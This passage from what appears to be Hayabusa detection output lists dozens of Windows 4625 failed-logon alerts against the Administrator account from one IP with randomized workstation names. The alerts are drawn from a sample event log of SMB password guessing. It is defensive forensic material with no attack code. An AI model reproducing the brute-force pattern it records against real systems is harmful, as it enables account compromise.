+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: 
